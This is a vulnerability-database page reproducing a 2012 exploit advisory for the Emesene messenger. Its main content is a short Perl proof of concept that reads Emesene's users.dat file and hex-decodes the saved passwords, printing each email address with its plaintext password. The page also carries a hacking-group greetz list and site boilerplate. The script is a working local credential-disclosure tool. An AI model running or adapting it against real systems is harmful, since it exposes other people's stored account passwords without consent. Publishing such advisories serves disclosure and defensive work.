Lucene search
K

Emesene 2.12.5 Password Disclosure

🗓️ 02 Jul 2012 00:00:00Reported by Daniel GodoyType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 16 Views

Emesene 2.12.5 Password Disclosure, Linux, Perl script, MailMonstru

Code
`# Exploit Title: Emesene Password Disclosure  
# Category: Local  
# Date: 29/06/2012  
# Author: Daniel Godoy  
# Author Mail: DanielGodoy[at]GobiernoFederal[dot]com  
# Author Web: www.delincuentedigital.com.ar  
# Sofware web: http://blog.emesene.org/p/downloads.html  
# Tested on: Linux  
  
The only requirement to run the script is that the customer is  
highlighted remember password.  
  
[Comment]  
Greetz: Hernan Jais, Alfonso Cuevas, SPEED, hacklego, Incid3nt,  
Maximiliano Soler, Pablin77,_tty0, Login-Root,Knet,Kikito,Duraznit0,  
InyeXion, ksha, zerial,LinuxFer, Scorp  
her0, r0dr1 y demas user de RemoteExecution  
www.remoteexecution.info www.remoteexcution.com.ar  
#RemoteExecution Hacking Group  
  
[PoC]  
  
#!/usr/bin/perl  
#/home/$HOME/.config/emesene1.0  
system("clear");  
print "[ EMESENE PASSWORD DISCLOSURE ]\n";  
print "TESTED ON UBUNTU 10.04 LTS\n";  
my $pwn="users.dat";  
open (ENTRADA,"<$pwn") || die "ERROR: No puedo abrir el fichero $pwn\n";  
$cantidad++ while <ENTRADA>;  
close (ENTRADA);  
open (ENTRADA,"<$pwn") || die "ERROR: No puedo abrir el fichero $pwn\n";  
@source = <ENTRADA>;  
for($i = 0; $i < $cantidad; $i++)  
{  
@password= split(":", $source[$i]);  
print "Mail: ".$password[0]." Password PWND! => ";  
print pack("H*", $password[1]), "\n";   
}  
close (ENTRADA);  
  
-------------------------  
Correo enviado por medio de MailMonstruo - www.mailmonstruo.com  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

02 Jul 2012 00:00Current
7.4High risk
Vulners AI Score7.4
16